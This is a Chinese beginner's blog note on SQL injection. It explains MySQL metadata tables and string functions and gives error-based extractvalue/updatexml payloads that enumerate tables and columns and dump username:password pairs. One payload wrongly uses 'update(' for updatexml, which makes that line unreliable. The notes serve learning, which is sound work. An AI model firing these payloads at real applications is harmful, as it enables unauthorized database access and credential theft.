一些入门的的SQL注入小白基础笔记

最新推荐文章于 2023-04-29 00:08:48 发布
最新推荐文章于 2023-04-29 00:08:48 发布
阅读量335 收藏 3
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/unimoon1995/article/details/100150521
版权

SQL注入:
user()返回当前数据库连接使用的用户;
database()返回当前数据库连接使用的数据库;
version()返回当前数据库的版本;

information_schema为mysql中自带的数据库,提供访问数据库元数据的方式。
元数据:关于数据的数据,如数据库名或表名,列的数据类型,或访问权限等。
information_schema中,有数个只读表。实际上为视图,不是基本表。实际上为一个虚拟的数据库。只能通过select语句访问,不能对其进行增删改。

information_schema中的表:
schemata:所有库
tables:所有表
columns:所有字段

information_schema.tables表中
提供了关于数据库中表的信息
TABLE_SCHEMA ---->库名
TABLE_NAME ---->表名
TABLE_TYPE ---->表类型
ENGINE ---- >引擎
Version ---->版本
TABLE_ROWS ---->表的行数
AVG_ROW_LENGTH ---->表中行的平均行(字节)
INDEX_LENGTH ---->索引的占用空间大小(字节)

concat_ws(separator,str1,str2,…) 函数可以将这些函数进行组合使用并显示出来,其中第一个参数是作为分隔符使用,使用分隔符分隔再进行连接产生新的字符串
group_concat():将group by产生的同一个分组中的值连接起来,返回一个字符串结果。

关于concat函数和concat_ws()函数的实例:
select concat(‘大’,‘小’) as size from 表
查询出结果为:大小

select concat(‘大’,NULL) as size from 表
查询出结果为:null
concat中又一个参数为NULL,查出来的就为NULL

select concat_ws(’_’,‘大’,‘小’,‘中’) as size from 表
查询出结果为:大_小_中

select concat_ws(’_’,‘大’,‘小’,NULL) as size from 表
查询出结果为:大_小

group_concat( [distinct] 要连接的字段 [order by 排序字段 asc/desc ] [separator ‘分隔符’] )

在这里插入图片描述

MySQL LIMIT获取前N行
SELECT column1,column2,… FROM table LIMIT N;
从第N行开始获取,获取M行
LIMIT M OFFSET N
如果回显只有一行,可以修改N从0~N 依次显示所有表名/字段名

extractvalue():从目标XML中返回包含所查询值的字符串。
  EXTRACTVALUE (XML_document, XPath_string);
  第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
第二个参数:XPath_string (Xpath格式的字符串)

UPDATEXML(XML_document, XPath_string, new_value);
new_value,String格式,替换查找到的符合条件的数据
作用:改变文档中符合条件的节点的值
改变XML_document中符合XPATH_string的值

Payload:
or extractvalue(1, concat(0x7e, version())) or ‘’
or update(1, concat(0x7e, version()), 1) or ‘’

爆表名:
or extractvalue(1, concat(0x7e, (select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1))) or ‘’
爆字段名:
or extractvalue(1, concat(0x7e, (select concat(column_name) from information_schema.columns where table_name=‘users’ limit 0,1))) or ‘’
爆数据:
or extractvalue(1, concat(0x7e, (select concat_ws(’:’, username, password) from users limit 0,1))) or ‘’
updatexml的注入方式相同

ascii(str1)函数:
返回字符串str的最左面字符的ASCII代码值
str是空字符串,返回0
如果str是NULL,返回NULL
例:mysql> select ascii(‘hi’);
+————-+
| ascii(‘hi’) |
+————-+
| 104 |
+————-+
1 row in set

substring(string,position):
substring(str, pos, length) :#(被截取字段,从第几位开始截取,截取长度)
从特定位置开始的字符串返回一个给定长度的子字符串
string参数是要提取子字符串的字符串
position参数是一个整数,用于指定子串的起始字符,position可以是正或负整数。

unimoon1995
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入和sql-labs通关1-18(手工注入、高权限注入、文件读写、提交方式、查询方式、WAF绕过、sqlmap)
m0_61506558的博客
07-25 832
对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。......
【万字长文】SQL注入(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Libra1313的博客
03-17 5585
之前一直有粉丝朋友,在挖漏洞过程中使用到SQL注入,希望大白给他讲解一些的SQL注入,今天大白也特地给粉丝朋友安排好了SQL注入攻击方式根据应用程序处理数据库返回内容的不同,可以分为可显注入、报错注入和盲注。
SQL注入基础入门篇 注入思路及常见的SQL注入类型总结
好好睡觉
03-04 6766
SQL注入基础部分、注入脚本、常见注入类型分类、报错注入、联合查询思路
关于sql注入这一篇就够了(适合入门
qq_53105813的博客
01-07 4929
sql注入详解
SQL 注入 (入门学习 详解)
会哭的猫的博客
06-29 2407
SQL注入 SQL注入的两个前提:1.入户可输入内容,且要输入的内容是可控的。2.输入内容一定与数据库交互的。 如图所示,就显示可输入内容,且与数据库交互: CMS SQL注入 CMS逻辑:index.php首页显示内容,具有文章列表,articles.php文章详细页,URL中article.php?id=文章id读取Id文章。 Sqlmap的使用 ...
SQL注入基础.pdf
07-05
介绍SQL注入的原理,常见入侵与防御方式,手工注入或者工具注入
SQL注入笔记-union联合查询
03-21
SQL注入笔记-union联合查询
sql注入之新手入门示例详解
09-10
本文将从基础层面介绍SQL注入的原理、检测方法以及初步的防范措施。 首先,我们需要理解SQL注入的基本概念。当用户输入的数据(如URL参数`id`)被直接拼接到SQL查询中,如`SELECT username, password FROM table ...
SQL注入手工笔记.txt
11-29
SQL手工注入小结笔记,大家都来学习学习
SQL注入基础和进阶.pdf
12-26
"SQL注入基础和进阶" SQL注入是指Web应用程序对用户输入的数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数带入数据库查询,那么攻击者可以通过构造不同的SQL语句来实现对数据库的任意操作。开发...
sql注入学习入门
12-16
sql注入学习入门
SQL注入入门
永远相信美好的事情即将发生
03-09 477
sql注入基础入门
SQL注入基础入门
wyp20011020的博客
03-29 220
sql注入
SQL注入从0到1
Elite的博客
04-29 2821
SQL注入为OWASP top 10漏洞之一,本文带你由浅入深了解SQL注入基本原理,深度掌握各种注入方式
sql注入入门学习
weixin_53146913的博客
07-20 452
MySQl注入的一般流程
Web安全-SQL注入基础方法
11-13
SQL注入经过21年的发展,至今为止依然是OWASP 排名最严重的漏洞,可以看出SQL漏洞危害的严重性和持久性,本节课程从以下几个方面来讲解SQL注入课程一、SQLmap课程二、SQL注入的防范与绕过课程三、宽字节注入课程四、手工注入盲注入课程五、密码演示&手工注入演示
小白SQL注入基础入门(持续修改)
MSB_WLAQ的博客
10-12 390
1.SQL分类 基于变量数据类型分 数字型注入 字符型注入 '' ' ) ') 搜索型注入 %’ JSON型注入(判断是数字还是字符 考虑要不要闭合 JSON={"XINGMING":"DUMP' and 1=2 union select 1,database(),2 #"} 基于获取数据的方法 基于回显 基于错误 盲注 布尔型盲注 时间盲注 基于注入点位置分类(请求方法) 注入要判断是否有干扰 GET注入 Cookie注入 POST注入(登录框)REQUEST 注入 (全部接受) H
简单的sql注入式攻击 教程(小白
热门推荐
有一棵枣树在庭前
04-30 1万+
SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。 以下是整理网上教程所得出的,如有误,非常感谢指出
Sql注入入门教程
New_Ss_的博客
01-29 1531
Sql注入比较常见的漏洞之一,例用程序员的漏洞来进行无账号的登陆,篡改数据库。任何客户端可控,传参数到服务端的变量,和数据库交互,都有可能存在sql注入 原理 用户通过构造sql语句来模仿服务器发向服务器的语句,造成错误执行。从而达到自己的目的。 sql注入的步骤 1.发现注入位置。 2.判断注入类型传参方式的:get类型,post类型,cookie类型。 以及根据注入点不同的:数字型注入,单引号注入,双引号注入。 首先是单引号双引号注入(单引号为例): SELECT * FROM.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值